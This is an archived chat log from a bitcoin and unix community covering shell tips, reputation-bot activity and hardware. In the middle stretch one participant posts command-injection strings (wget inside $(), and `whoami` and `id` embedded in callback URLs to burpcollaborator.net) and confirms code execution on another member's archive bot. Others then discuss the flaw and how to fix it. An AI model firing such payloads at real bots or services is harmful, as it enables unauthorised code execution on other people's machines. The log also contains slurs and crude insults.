Forum logs for 03 Apr 2018
lobbes: | finally sat down and learned some basic sed commands. I especially love the ability to choose an alternate delimiter; it makes certain cases of escaping characters a breeze! | [00:13] |
* lobbes | currently hacking a script to convert all the absolute references in my downloaded kibo.com to relative | [00:14] |
mircea_popescu: | yep. %%% is better than /// | [00:15] |
lobbes: | turns out the whole kibo site is only 40 mb or so, so I figured I'd try and mirror the whole thing (after browsing it last night, I realized that the meta aspects of the site are part of the fun) | [00:16] |
lobbes: | plaintext dun do it justice | [00:17] |
* trinque | suddenly regrets whatever space unescaping \/ is taking up in his skull. | [00:17] |
mircea_popescu: | lobbes here's a bonus : suppose you have a lengthy file (such as say a server log) and you want to extract just one column. you got awk : cat hurr.txt | awk '{print $3}' (and -F will set the delimiter if space's no good). | [00:17] |
mircea_popescu: | trinque i despise tools that make you escape. really, it's fucking dumb, let the metachar be settable so i can not need it. | [00:18] |
mircea_popescu: | and now consider something like cat *** | grep "data.maryland.gov" | awk '{print $19..$22}' | sort -u << "get me the fields 19th through 22nd, once only, and sorted alphabetically". | [00:19] |
mircea_popescu: | sed + awk are the excel of posix. | [00:19] |
mircea_popescu: | and as it has to be said : you are not a man until you've played a browser game through curl, pipe and awk/sed. | [00:21] |
ben_vulpes: | http://logs.bvulpes.com/trilema?d=2018-4-2#324071 << how did these numbers come out? | [00:21] |
mimisbrunnr: | Logged on 2018-04-02 16:54 mircea_popescu: we just discussed this s.nsa is at the most selling one of the two spares. ill run the numbers later an' give you an aye or nay. | [00:21] |
mircea_popescu: | still working on it. | [00:23] |
ben_vulpes: | kk | [00:24] |
mircea_popescu: | asciilifeform http://p.bvulpes.com/pastes/FQiv2/?raw=true | [00:27] |
mircea_popescu: | in other webamusements, https://www.themastermindwithin.com/thoughts/blog-traffic-and-income-report-march-2018/ | [01:30] |
mircea_popescu: | "In March 2018, the blog had 7,556 page views and I made $27.09!!" | [01:30] |
mircea_popescu: | and in case anyone is missing the usagi era of bitcoin, it didn't end, it just moved on : http://behindmlm.com/companies/empower-network/david-wood-claims-he-can-heal-cancer-herpes-hiv-aids-diabetes/ | [02:01] |
ben_vulpes: | !!v 6214E787A837E6749DEE8709D2234A274FC8637BF1975414A17E6750FA2FAC26 | [03:37] |
deedbot: | ben_vulpes updated rating of shinohai from 1 to -1 << ran off and took a rather useful tool with him | [03:37] |
ben_vulpes: | anyone want to buy some electronics off amazon for me, get reimbursed in btc? | [04:00] |
deedbot: | http://pizarroisp.net/index.php/2018/04/03/pizarro-statement-march-2018/ << PizzaroISP - Pizarro Statement, March 2018 | [04:06] |
shinohai: | logs.bvulpes.com/trilema?d=2018-4-3#324450 <<< have used your script, and its former incantation from years ago - very useful things. My solution thus far is simply running a binhost locally, which is temporary as I try to tweak recipe for amd64. | [08:28] |
mimisbrunnr: | Logged on 2018-04-03 01:03 trinque: but, I would recommend a student go build his own by hand. doing so by reading my script would be fine, so long as you research every line to understand why that step was done. | [08:28] |
shinohai: | Also, trinque is your www of wot not updating at this time? | [08:29] |
shinohai: | Which brings me to: | [08:29] |
shinohai: | http://logs.bvulpes.com/trilema?d=2018-4-3#324610 <<< I'm sorry, been working on my new book "How to set chmod permissions in under 1 minute so users can log into their shell, and other things isp ops should know!" .... but I'll look into that as time permits. | [08:30] |
mimisbrunnr: | Logged on 2018-04-03 07:28 ben_vulpes: !!v 6214E787A837E6749DEE8709D2234A274FC8637BF1975414A17E6750FA2FAC26 | [08:30] |
shinohai: | Have a great day #trilema! | [08:30] |
shinohai: | Nos veremos despues. | [08:30] |
douchebag: | hey guys | [08:38] |
douchebag: | I think I got remote code execution on someone's box | [08:38] |
douchebag: | https://i.imgur.com/pPZlvQC.png | [08:39] |
douchebag: | the IP address begins with 174.108 | [08:39] |
douchebag: | If that's one of you, please contact me and I will help you resolve this issue | [08:39] |
mod6: | mornin! | [08:50] |
mod6: | shinohai, if you could bring that thing that'd be nice. | [08:50] |
mod6: | meanwhile, we should probably replace that bot functionality asap. we need a way to get VWAP recorded in here daily. | [08:51] |
lobbes: | I think shinohai was going to try and send me tars of jhvh1 sometime >> http://trilema.com/forum-logs-for-23-mar-2018#2414088 | [10:06] |
a111: | Logged on 2018-03-24 00:50 shinohai: I can tar the plugins up for you if you need 'em. | [10:06] |
lobbes: | either way, I'll try and slap up a vanilla gribble on my pizarro shell later this night | [10:06] |
lobbes: | how much fiat are we talkin'? If it is roughly under $500 I would be very interested >> http://btcbase.org/log/2018-04-03#1792246 | [10:10] |
a111: | Logged on 2018-04-03 08:00 ben_vulpes: anyone want to buy some electronics off amazon for me, get reimbursed in btc? | [10:10] |
* lobbes | bbl off to the saltmines | [10:10] |
ben_vulpes: | grade a smarm | [10:31] |
ben_vulpes: | lobbes: mk i'll letcha know | [10:31] |
douchebag: | Hey, would you guys be able to show me up a pizarro shell for trb? | [10:34] |
asciilifeform: | mircea_popescu: http://btcbase.org/log/2018-04-03#1792240 >>> http://p.bvulpes.com/pastes/fIWW0/?raw=true | [11:03] |
a111: | Logged on 2018-04-03 04:27 mircea_popescu: asciilifeform http://p.bvulpes.com/pastes/FQiv2/?raw=true | [11:03] |
asciilifeform: | http://btcbase.org/log/2018-04-03#1792259 << neither mine nor anyone i know of | [11:04] |
a111: | Logged on 2018-04-03 12:39 douchebag: the IP address begins with 174.108 | [11:04] |
asciilifeform: | http://btcbase.org/log/2018-04-03#1792258 << this pic is distinctly uninformative , i'd like to note | [11:04] |
a111: | Logged on 2018-04-03 12:39 douchebag: https://i.imgur.com/pPZlvQC.png | [11:04] |
douchebag: | asciilifeform: Basically last night I was sending commands in the bot that would lead to remote code execution | [11:05] |
douchebag: | The code execution being wget the url provided in case of blind RCE | [11:05] |
asciilifeform: | douchebag: ok, so carry on, put up a goatse on deedbot.org or whatever you normally do | [11:06] |
douchebag: | well it isn't deedbots IP | [11:07] |
asciilifeform: | tho the moar likely explanation is that trinque read the machine log, and, laughing, went to look at what was in yer intended payload url | [11:07] |
asciilifeform: | but i'll let him answer this one. | [11:07] |
douchebag: | Yeah I figured that was a possibility, I just figured I would mention that in case the code did get executed by anything unintentionally | [11:07] |
asciilifeform: | this is possibly foreign concept in 'web' world, but over here in the adult world people , for instance, read logs. every day. | [11:07] |
asciilifeform: | and uudecode payloads, deobfuscate js , whatever. | [11:08] |
asciilifeform: | ( and typically very disappointing, usually quite uninspiring, stale '1000-days' ) | [11:08] |
asciilifeform: | http://btcbase.org/log/2018-04-03#1792252 << there is still time to turn back from nubbinsing, shinohai | [11:10] |
a111: | Logged on 2018-04-03 12:30 shinohai: http://logs.bvulpes.com/trilema?d=2018-4-3#324610 <<< I'm sorry, been working on my new book "How to set chmod permissions in under 1 minute so users can log into their shell, and other things isp ops should know!" .... but I'll look into that as time permits. | [11:10] |
mimisbrunnr: | Logged on 2018-04-03 07:28 ben_vulpes: !!v 6214E787A837E6749DEE8709D2234A274FC8637BF1975414A17E6750FA2FAC26 | [11:10] |
asciilifeform: | douchebag: consider, 174.108. is a konsoomer cable isp in usa . | [11:13] |
asciilifeform: | ('time-warner' co. ) | [11:14] |
trinque: | douchebag: that is not any of my IPs | [11:18] |
trinque: | what'd you do that got it to belch? | [11:18] |
douchebag: | no clue, I just checked the logs and saw that lolz.txt was grabbed via wget | [11:24] |
trinque: | auditor: "says here you talk like a fag, and your shit's all retarded" | [11:29] |
shinohai: | http://logs.bvulpes.com/trilema?d=2018-4-3#324728 << one could also behave a bit more becoming of a "Lord" and wait until official defrocking occurs before leading the negrate charge? | [11:29] |
mimisbrunnr: | Logged on 2018-04-03 15:01 asciilifeform: http://btcbase.org/log/2018-04-03#1792252 << there is still time to turn back from nubbinsing, shinohai | [11:29] |
trinque: | douchebag: I'm asking what the test was, which involved lolz.txt | [11:29] |
asciilifeform: | shinohai: ben_vulpes made the reason for his neg quite unmysterious, imho | [11:30] |
shinohai: | but i like salt, my popcorn has been a bit bland of late. | [11:31] |
shinohai: | ben_vulpes is also aware *why* checking if bot is in #trilema these days is kinda low on list of priorities, as i am in field and only read logs. | [11:32] |
shinohai: | I don't see join/parts | [11:32] |
douchebag: | trinque: I was just issuing commands to the bot | [11:33] |
douchebag: | ie: !!send $(wget http://site.com/lolz.txt) | [11:33] |
douchebag: | And I saw the file actually was requested with wget from an IP address I did not recognize | [11:34] |
trinque: | yeah I followed that part the first time | [11:34] |
douchebag: | Okay so what's the question? | [11:34] |
trinque: | after which command did you get a boop | [11:35] |
douchebag: | I have no clue - I woke up this morning and saw it in the logs | [11:35] |
douchebag: | I tried a number of different requests | [11:35] |
douchebag: | i mean commands | [11:35] |
trinque: | gpg me the full IP? | [11:36] |
shinohai: | I mean, i still can't play eulora because minigame.bz/ hasn't a server, but i certainly didn't negrate the lot of the #pizarro folks. | [11:37] |
trinque: | shinohai: weren't you running a bot? | [11:38] |
trinque: | instead of whining about it, why not bring back said bot | [11:38] |
shinohai: | yup and it shall rejoin as soon as i get back @ desk. my apologies for inconvenience | [11:38] |
shinohai: | whining indeed. | [11:39] |
trinque: | yes, whining. indeed. | [11:39] |
BingoBoingo: | <mircea_popescu> so this upscale local market ("automercado") that stocks all the shit i buy and consequently got a multi-mn monthly account came up with the very dubious idea of running a promotion. one of those things where you get stickers with your receipt and then you fill a book ? in the terms of the master provisioneer, "they'll rue the day!". i think she's got like twenty of the things all lined up. << Here "automercados" are | [12:36] |
BingoBoingo: | roughly convenience stores. The servicios tend to have better sandwiches | [12:36] |
ben_vulpes: | !!v A4C82702BD7A91BE63B8838DB2164C2B2BC39E9F99B411FB0EEDB8D2192D1F3F | [12:39] |
deedbot: | ben_vulpes unrated shinohai. | [12:39] |
BingoBoingo: | douchebag: When are some Qntra submissions incoming? | [12:43] |
douchebag: | I can have some ready tonight if you can link me to where qntra shares are traded | [12:44] |
douchebag: | last time I tried looking there were so many broken links | [12:44] |
ben_vulpes: | http://logs.bvulpes.com/trilema?d=2018-4-3#324745 << you have it backwards: how i behave defines lordship, and lo, i got my way | [12:45] |
mimisbrunnr: | Logged on 2018-04-03 15:20 shinohai: http://logs.bvulpes.com/trilema?d=2018-4-3#324728 << one could also behave a bit more becoming of a "Lord" and wait until official defrocking occurs before leading the negrate charge? | [12:45] |
mimisbrunnr: | Logged on 2018-04-03 15:01 asciilifeform: http://btcbase.org/log/2018-04-03#1792252 << there is still time to turn back from nubbinsing, shinohai | [12:45] |
BingoBoingo: | douchebag: On MPEx, there's proxy issues being sorted out. Sometimes the proxies run away and MP has to chain them back to his Ex | [12:54] |
BingoBoingo: | In other news, the nose is mostly under control. South American cold still has my energy rather zapped. The Incan nurse however did apologize last night. | [12:57] |
asciilifeform: | hey BingoBoingo , possibly i already asked this a while back and then lost -- but plox to gpg me a postage addr where you can get mail. i want to try experiment. | [12:58] |
ben_vulpes: | hola mircea_popescu | [13:03] |
BingoBoingo: | asciilifeform: http://p.bvulpes.com/pastes/Yvat8/?raw=true | [13:04] |
asciilifeform: | danke BingoBoingo | [13:04] |
BingoBoingo: | asciilifeform: Remember, nothing of incredible value. I am still awaiting a birthday card from February. | [13:05] |
mircea_popescu: | heya! | [13:05] |
BingoBoingo: | Buenas Tardes | [13:06] |
asciilifeform: | and yes BingoBoingo i did think of the item you mentioned, and already prepared it, it ought to satisfy | [13:06] |
asciilifeform: | ohai mircea_popescu | [13:06] |
trinque: | douchebag: consider that if you figure out which box responded to you, you at the very least can improve some Lord's bot for him, maybe lobbes' archivebot slurped it? At best, (if it was done in PM), you've got something else listening in, slurping things up. | [13:06] |
trinque: | that latter would be a mighty interesting blog post | [13:07] |
BingoBoingo: | trinque: Remember the "Reddit Police" DDoS bot? | [13:07] |
trinque: | naw | [13:08] |
BingoBoingo: | That was 2014-ish | [13:08] |
BingoBoingo: | Roughly coincided with the GAW miners drama. | [13:08] |
mircea_popescu: | http://btcbase.org/log/2018-04-03#1792252 << lol wait, is he on the list of pizarro victims, with thewhet, minigame an' so on ? or what dramas am i missing here ? | [13:09] |
a111: | Logged on 2018-04-03 12:30 shinohai: http://logs.bvulpes.com/trilema?d=2018-4-3#324610 <<< I'm sorry, been working on my new book "How to set chmod permissions in under 1 minute so users can log into their shell, and other things isp ops should know!" .... but I'll look into that as time permits. | [13:09] |
mimisbrunnr: | Logged on 2018-04-03 07:28 ben_vulpes: !!v 6214E787A837E6749DEE8709D2234A274FC8637BF1975414A17E6750FA2FAC26 | [13:09] |
mircea_popescu: | BingoBoingo i remember a "bitcoin police" lol ? | [13:09] |
mircea_popescu: | (they, self-importantly, didn't want to give self up to #b-a, because of course http://trilema.com/and-in-todays-lulz-the-obnoxious-cocksucker ) | [13:10] |
BingoBoingo: | mircea_popescu: Maybe that's what it was. | [13:10] |
mircea_popescu: | http://btcbase.org/log/2018-04-03#1792250 << iirc they were compiled once a day. | [13:10] |
a111: | Logged on 2018-04-03 12:29 shinohai: Also, trinque is your www of wot not updating at this time? | [13:10] |
trinque: | correct, cronulated | [13:12] |
ben_vulpes: | http://logs.bvulpes.com/trilema?d=2018-4-3#324705 << do you not have a machine capable of building trb? | [13:12] |
mimisbrunnr: | Logged on 2018-04-03 14:25 douchebag: Hey, would you guys be able to show me up a pizarro shell for trb? | [13:12] |
douchebag: | My machines are capable but if I'm going to be running a node, it would probably be best to have a dedicated VPS to do so | [13:12] |
mircea_popescu: | douchebag generally it runs on actual dedicated machines, rather than vps. | [13:13] |
mircea_popescu: | http://btcbase.org/log/2018-04-03#1792263 << it's all random numbers anyways. | [13:13] |
a111: | Logged on 2018-04-03 12:51 mod6: meanwhile, we should probably replace that bot functionality asap. we need a way to get VWAP recorded in here daily. | [13:13] |
douchebag: | Ahh okay | [13:14] |
BingoBoingo: | douchebag: The added value in running more nodes is generally spreading the network geographically, etc. There's little value in adding yet another nominal node to the same box or AWS freakshow | [13:14] |
mircea_popescu: | http://btcbase.org/log/2018-04-03#1792259 << did this ever come to anything then ?! | [13:14] |
a111: | Logged on 2018-04-03 12:39 douchebag: the IP address begins with 174.108 | [13:14] |
mircea_popescu: | douchebag dood is building the UCI before we even have it lmao. | [13:14] |
douchebag: | UCI? | [13:15] |
mircea_popescu: | !#s UCI | [13:15] |
a111: | 189 results for "UCI", http://btcbase.org/log-search?q=UCI | [13:15] |
mircea_popescu: | "universal computing interface" | [13:15] |
douchebag: | ahh | [13:16] |
* trinque | put a rather beefy node in the pizarro rack at 161.0.121.250 | [13:16] |
trinque: | 376103 and counting | [13:16] |
douchebag: | Oh also | [13:16] |
mircea_popescu: | asciilifeform the pic shows that he got "something" to load a file from his filehost. supports the theory that has rce, if he can run wget he can run plenty. | [13:17] |
douchebag: | When I geoip'd that IP address | [13:17] |
mircea_popescu: | (consider, the way linux works today, if i can run wget as a user i can take the box, the memory leaks.) | [13:17] |
asciilifeform: | nobody seems to know who or what ran the wget | [13:18] |
mircea_popescu: | wget WILL time the netcard for you, the netcard has dma, that's the whole story. | [13:18] |
mircea_popescu: | asciilifeform well, some ip apparently. i dunno, going through teh logs. | [13:18] |
asciilifeform: | asciilifeform's observation was that every idjit crapartist probing an asciilifeform-tended box , ever, without exception thought 'ooh, my wget ran' when asciilifeform reads log , and then , on specially-designated box, manually probes back & grabs payload | [13:19] |
asciilifeform: | ... but in this case, wasn't mine. and, interestingly, apparently not trinque either | [13:20] |
mircea_popescu: | this is a theory we can easily verify. douchebag write f2c26beed4 on the boxes' tits or something. can you get it reliably ? | [13:21] |
mircea_popescu: | not entirely intractable to discern whether human is involved or not. | [13:21] |
asciilifeform: | aha, supposing replicable | [13:22] |
mircea_popescu: | time will tell you everything. | [13:22] |
douchebag: | I need to get the boxes full IP | [13:22] |
douchebag: | sec | [13:22] |
douchebag: | Actually, I exited out of that - I'm able to retrieve it but I need to know the proper request to send. waiting on a response from that right now | [13:22] |
deedbot: | http://trilema.com/2018/dangerous/ << Trilema - Dangerous | [13:23] |
mircea_popescu: | the proper who ? | [13:23] |
mircea_popescu: | douchebag do you use screen, incidentally ? | [13:23] |
douchebag: | yes | [13:23] |
mircea_popescu: | a ok then. | [13:24] |
douchebag: | I did do a reverse search on that IP address though | [13:24] |
douchebag: | It seemed to be out of North Carolina if I remember correctly | [13:24] |
* lobbes | is slowly assembling parts for his own home trb node. Waiting on replacement cpu fan to come in atm. Updates to follow! | [13:24] |
douchebag: | 174.108.31.15 | [13:24] |
douchebag: | ^ Full IP | [13:25] |
* mircea_popescu | has noticed over the years that the usage of screen is a sort of pons asinorum in computer usage. like the oil rag cloth in a car distinguishes pisi tourist from the driver who actually maintains the machinery or like condoms on the nightstand distinguish the woman from the girl and so on. | [13:25] |
lobbes: | Re: douchebag's recent wget payload: I can confirm that it most likely wasn't my archivebot. The bot doesn't download links directly, it stores list of urls found in chan and forwards them to the archive.is submit form | [13:25] |
mircea_popescu: | http://btcbase.org/log/2018-04-03#1792286 << i very well fucking don't. jesus christ, 1mn+ lines/day, god help me. i catgrep the item now and again, but the odds of me noticing something in there are pretty slim. | [13:26] |
a111: | Logged on 2018-04-03 15:07 asciilifeform: this is possibly foreign concept in 'web' world, but over here in the adult world people , for instance, read logs. every day. | [13:26] |
asciilifeform: | y'know it's still 'read' if you put it through meatgrinder | [13:26] |
mircea_popescu: | but very distantly read. it's a perl meatgrinder, i'm sure it misses most of the meat. | [13:27] |
mircea_popescu: | douchebag looks like a home ip. | [13:27] |
mircea_popescu: | vulnerable home computers are pestilentially common. did you get to the portion in the logs where we logged into a shitton of servers administering solar panels ? | [13:28] |
mircea_popescu: | http://btcbase.org/log/2018-04-03#1792296 << oh don't be silly. i now concur with alf, this is no indication of anything yet. get it to do it systematically, in reaction to something you control, THEN you have maybe something. | [13:30] |
a111: | Logged on 2018-04-03 15:24 douchebag: no clue, I just checked the logs and saw that lolz.txt was grabbed via wget | [13:30] |
mircea_popescu: | http://btcbase.org/log/2018-04-03#1792298 << what do these two have to do with each other anyway. there should be a difference between doing wrong and not doing enough. not every burgher can be in the town council, that dun mean he's bankrupt now or something, what the hell. | [13:33] |
a111: | Logged on 2018-04-03 15:29 shinohai: http://logs.bvulpes.com/trilema?d=2018-4-3#324728 << one could also behave a bit more becoming of a "Lord" and wait until official defrocking occurs before leading the negrate charge? | [13:33] |
mimisbrunnr: | Logged on 2018-04-03 15:01 asciilifeform: http://btcbase.org/log/2018-04-03#1792252 << there is still time to turn back from nubbinsing, shinohai | [13:33] |
douchebag: | It it okay if I test this payload again right now | [13:33] |
douchebag: | To see if I get another pingback | [13:33] |
mircea_popescu: | i don't see why not. | [13:34] |
BingoBoingo: | Best case it's just the FBI and they are too busy chasing imaginary Russians to notice you walking away with their server | [13:34] |
douchebag: | Alright, give me a moment I just didn't want to bother anyone with my payloads | [13:34] |
lobbes: | douchebag aha I think that is my home ip. Plox do test payload again | [13:40] |
douchebag: | Oh shit, and you never manually ran wget on that IP | [13:40] |
douchebag: | ???? | [13:40] |
douchebag: | or on the link??? | [13:41] |
lobbes: | Actually, when was this? I think I may hace manually wgot | [13:41] |
lobbes: | *have | [13:41] |
douchebag: | last night | [13:41] |
douchebag: | vjiayxgdlqk1veovjxso63g6ixopce.burpcollaborator.net | [13:41] |
douchebag: | on something that looked like that | [13:41] |
lobbes: | Hmm interesting. Yeah this was a few weeks ago iirc when I curiously grabbed one of yer payloads via wget | [13:42] |
douchebag: | yeah no dude | [13:42] |
douchebag: | If you didn't do this last night | [13:42] |
douchebag: | I got remote code execution on your box | [13:42] |
douchebag: | Can you send me links to the scripts ? | [13:42] |
douchebag: | I'll show you how to fix it | [13:42] |
lobbes: | Also not 100% positive if that was my home ip, but charlotte nc is my residence. I'll confirm that tonight | [13:43] |
douchebag: | So lobbes | [13:43] |
douchebag: | Are any of these things being manually passed into bash commands | [13:44] |
douchebag: | here lets see something | [13:45] |
douchebag: | http://6w3lb8toy1xc8p16w85zjethv814pt.burpcollaborator.net/`whoami` | [13:45] |
douchebag: | lobbes: How often does the bot search ? | [13:46] |
douchebag: | http://3nri25klpyo9zms3n5wwabkem5s2gr.burpcollaborator.net/$(whoami) | [13:48] |
lobbes: | the bot operates from an external vps (not my home ip). Shoves urls into a db which my home box downloads and then passes each one to archive.is. | [13:50] |
douchebag: | and how are you passing these to archive.is | [13:50] |
lobbes: | That is done through a process where a python script reads from (ahhh now I think I see where it may remotely execute) db and passes url via bash to a phantomjs script which submits to archive.is | [13:52] |
douchebag: | Hahaha | [13:52] |
douchebag: | Awesome | [13:52] |
douchebag: | Well for me at least | [13:52] |
douchebag: | For you, I really do suggest fixing that | [13:52] |
lobbes: | I'll dig more into it tonight once I'm in front of it all | [13:52] |
douchebag: | Because if I was a blackhat I could have pwned ur home box | [13:53] |
lobbes: | Yeah really. Thank you for uncovering this (I am n00b, you will soon learn) | [13:53] |
douchebag: | No problem man, just glad I could help! | [13:54] |
lobbes: | Likewise, I'll give ya a favorable rating once in front of my gpg key | [13:54] |
douchebag: | Sounds like a plan | [13:54] |
trinque: | wd douchebag | [13:57] |
douchebag: | thx <3 | [13:58] |
mircea_popescu: | lobbes fwiw this is very poor design. | [14:01] |
lobbes: | Oya. Hey, this is the peril of "learning as you go" | [14:02] |
lobbes: | What would you suggest as a better design? Obvs no passing urls via bash | [14:02] |
mircea_popescu: | why is your home box doing work that's not directed at you ? | [14:03] |
mircea_popescu: | conceptually, if it's talking to you it's an infangwif if it's talking to the outside it's an outsidewif. why are you fucking streetwalkers / sending the wife to walk the streets ? | [14:03] |
mircea_popescu: | when you say "home box", what do you even mean ? | [14:04] |
douchebag: | lobbes: If you want to make a secure application, consider all user input as malicious | [14:05] |
douchebag: | lobbes | [14:05] |
douchebag: | Your home machine's name is lobbes | [14:05] |
douchebag: | correct? | [14:05] |
lobbes: | mircea_popescu: the logs, but it is an old craptop with an ssd dedicated to public toilet. Only place I had to store the gbs of archive data. | [14:06] |
lobbes: | douchebag si | [14:06] |
douchebag: | Yep | [14:06] |
douchebag: | https://i.imgur.com/Wwrp9VP.png | [14:06] |
douchebag: | RCE confirmed | [14:06] |
mircea_popescu: | lobbes well fine, but i was discussing teh design as such. there's no rule against "i have a crappy box for a server that's not worth placing in a dc so it sits in garage", sure. nor is there any rule against "i just simplified speech, called it homebox, it's not" -- but what you say is all i have to go on, that's all. | [14:07] |
mircea_popescu: | douchebag umm, you used his ~browser~ to do this ?! | [14:08] |
douchebag: | I think it's being passed into bash into a PhantomJS interpreter | [14:08] |
lobbes: | ^^ | [14:08] |
mircea_popescu: | oh. | [14:09] |
mircea_popescu: | nifty. | [14:09] |
lobbes: | Man I feel stupid in general | [14:09] |
mircea_popescu: | !!rated douchebag | [14:09] |
deedbot: | mircea_popescu rated douchebag 1 at 2018/01/15 07:34:46 << hyde.solutions | [14:09] |
mircea_popescu: | !!rate douchebag 2 "your home machine's name is lobbes" | [14:09] |
deedbot: | Get your OTP: http://p.bvulpes.com/pastes/Nn9Ye/?raw=true | [14:09] |
douchebag: | lobbes: Just make sure whenever you handle any user input, consider all input as potentially malicious | [14:11] |
mircea_popescu: | ben_vulpes i wasn't initially going to say anything besides "nay" but hey, pizarro's a friend of ours, so : nsa would sell the spare machine for cost, which is about .371. comes with two fgs installed and free shipping. | [14:11] |
douchebag: | and for fucks sake do not pass any user input into a bash interpreter | [14:11] |
lobbes: | douchebag really though, this has been a wake up call to get my shit together. Ty again | [14:12] |
douchebag: | Yeah no problem, it was pretty fun to discover | [14:13] |
mircea_popescu: | !!v 86FC0A4A826976505E6815A4D3677651F10E73948ED9B253C022B65F6C2DFB4E | [14:13] |
deedbot: | mircea_popescu updated rating of douchebag from 1 to 2 << "your home machine's name is lobbes" | [14:13] |
lobbes: | Just know, I'm prolly the easiest target here :P | [14:13] |
mircea_popescu: | i'm not so certain. | [14:13] |
douchebag: | http://f0gufhxx2a1lcy5f0h98nnxqzh5ht6.burpcollaborator.net/`id` | [14:14] |
mircea_popescu: | https://portswigger.net/burp/help/collaborator << that burp thing's not even retarded. runs a dummy server on the side, ns, everything. | [14:16] |
mircea_popescu: | douchebag do you know who made it ? | [14:16] |
douchebag: | It's made by a team of people | [14:17] |
douchebag: | It was originally developed by dafydd portswigger | [14:17] |
mircea_popescu: | right. | [14:17] |
douchebag: | now he has a couple other people working on it, I know ones name is James Kettle | [14:17] |
mircea_popescu: | did you spring for teh $350 a year thing ? | [14:18] |
douchebag: | Yeah, well worth it | [14:18] |
mircea_popescu: | i believe. | [14:18] |
douchebag: | mircea_popescu: I got 0.01 for perma voice, do I get 0.02 for Remote Command Execution :-D ? | [14:19] |
mircea_popescu: | lol. i was going to buy you the pro yearly package, actually. but since you already have it, no need :D | [14:20] |
douchebag: | I appreciate that, feel free to reimburse it though haha | [14:20] |
douchebag: | Man I lol | [14:22] |
lobbes: | Anyways, archivetron's url snarf has been temporarily disabled for obvious reasons. Will resume once I plug these holes tonight | [14:22] |
lobbes: | I'll announce once back up | [14:22] |
douchebag: | I bet so many bots could be pwned with similar techniques | [14:22] |
mircea_popescu: | douchebag i'll get you a server once the pizarro folk unwrap their heads enough to actually have one on offer. so you can tinker on gentoo, trb etc and get out of the "vps" bs hell. | [14:23] |
douchebag: | A physical serve ?! | [14:23] |
douchebag: | server* | [14:23] |
asciilifeform: | hey maybe he will be the test patient for the new arm boxen. | [14:23] |
mircea_popescu: | douchebag yeah. | [14:24] |
mircea_popescu: | asciilifeform i dunno he can arm... one thing at a time. | [14:24] |
douchebag: | Holy shit thanks!! | [14:24] |
mircea_popescu: | yeah, tell you what, i'll be as happy as you are once it's finally done. | [14:25] |
asciilifeform: | mircea_popescu: if all he needs is standard unix userland, no reason he couldn't arm. | [14:25] |
mircea_popescu: | what was on those, i forget ? | [14:25] |
asciilifeform: | the arm gentoo i am cooking up as we speak. | [14:25] |
mircea_popescu: | i meant hardware | [14:26] |
douchebag: | Well, I'm gonna grab a cigarette to aid with this excitement | [14:26] |
asciilifeform: | ROC-RK3328-CC ( currently building a kernel for it, without the 'evil' periphs ) | [14:27] |
asciilifeform: | chinese thing, they publish schematic , even. | [14:27] |
mircea_popescu: | but ram hdd etc ? | [14:27] |
asciilifeform: | the unit i am testing ( will buy a few moar once i'm satisfied that it is usable ) came with 2G. there is a 4G supposedly also in production, but i was not able to obtain it | [14:28] |
asciilifeform: | hdd is a highspeed SD card , and can be of any size. there is also a usb3 jack, 480MB/s and a 1G/s nic. | [14:28] |
mircea_popescu: | ah so could actually run trb np | [14:28] |
asciilifeform: | indeed it could | [14:29] |
asciilifeform: | faster, in principle, even than zoolag | [14:29] |
mircea_popescu: | this is neat. ok, chuck the largest sd you can find in there an' consider it sold. | [14:29] |
asciilifeform: | first things first, gotta terraform it. | [14:30] |
mircea_popescu: | yeah. | [14:30] |
asciilifeform: | then will simply clone the gentoo for each new user ( or he can transmit a SD image , signed , and BingoBoingo will pump it in, plug in a board, and up an' running ) | [14:30] |
mircea_popescu: | douchebag alf lands in the oriental republic sometime mid month you'll get your login then, an' your first task will be to get trb up on it and the tasks 2 through 999 will be to have fun. | [14:31] |
mircea_popescu: | so clear your schedule 2nd half of april for it. | [14:31] |
mircea_popescu: | asciilifeform i like the model. | [14:31] |
asciilifeform: | the interesting bit is that these boxen draw ~2 - 5 watt. and are of the physical dimensions of a pack of cards. | [14:32] |
asciilifeform: | and (unlike e.g. 'raspberry') the full datashits and schems are published. | [14:32] |
asciilifeform: | chipset is a 'rockchip', i ported trb to it in 2015 iirc. | [14:32] |
asciilifeform: | (trb, buildroot-kernel, userlands) | [14:32] |
asciilifeform: | the other interesting pheature of this board is that it has no onboard flash. so nothing to sanitize aside from sdcard. | [14:33] |
asciilifeform: | ( also comes with audio and video but i do not need these and have not tried'em ) | [14:34] |
mircea_popescu: | http://btcbase.org/log/2018-04-03#1792306 << ahahaha | [14:35] |
a111: | Logged on 2018-04-03 15:33 douchebag: ie: !!send $(wget http://site.com/lolz.txt) | [14:35] |
mircea_popescu: | http://btcbase.org/log/2018-04-03#1792317 << well conceivably for the same reason alf isn't bringing back phuctor, neh. cuz he doesn't as of yet have where to bring it back from! | [14:36] |
a111: | Logged on 2018-04-03 15:38 trinque: instead of whining about it, why not bring back said bot | [14:36] |
mircea_popescu: | http://btcbase.org/log/2018-04-03#1792321 << sounds like local knockoff. this thing only exists in cr, some local entrepreneur (in the proper sense of the term) made a supermarket that actually works. | [14:37] |
a111: | Logged on 2018-04-03 16:36 BingoBoingo: <mircea_popescu> so this upscale local market ("automercado") that stocks all the shit i buy and consequently got a multi-mn monthly account came up with the very dubious idea of running a promotion. one of those things where you get stickers with your receipt and then you fill a book ? in the terms of the master provisioneer, "they'll rue the day!". i think she's got like twenty of the things all lined up. << Here "automercados" are | [14:37] |
mircea_popescu: | http://btcbase.org/log/2018-04-03#1792327 << yeah, bringing mpex proxies back up is underway. | [14:38] |
a111: | Logged on 2018-04-03 16:44 douchebag: last time I tried looking there were so broken links | [14:38] |
trinque: | general point of "nobody wants your head bud, just move in a direction". I guess he had a health problem, which is rough. | [14:38] |
lobbes: | To wrap back to this discussion, I think I see your point. There's no real reason this craptop needs to deal with the user input at all. All I need it for is to download, store and parse shit download from archive.is. >> http://btcbase.org/log/2018-04-03#17924 | [14:38] |
a111: | Logged on 2013-05-06 02:54 tiberiusiv: miami is not like NYC lol | [14:38] |
mircea_popescu: | http://btcbase.org/log/2018-04-03#1792332 << with both mouths, one would hope. | [14:38] |
a111: | Logged on 2018-04-03 16:57 BingoBoingo: In other news, the nose is mostly under control. South American cold still has my energy rather zapped. The Incan nurse however did apologize last night. | [14:38] |
asciilifeform: | mircea_popescu: s/meet/meat/g in footnote ii in yer latest article | [14:39] |
mircea_popescu: | lobbes the only important consideration here is that design is not a haphazard activity driven by occurrence and circumstance. that's implementation. design is a deductive activity, it proceeds from first principles and does not break faith. | [14:39] |
lobbes: | Wat a111 misquote? | [14:39] |
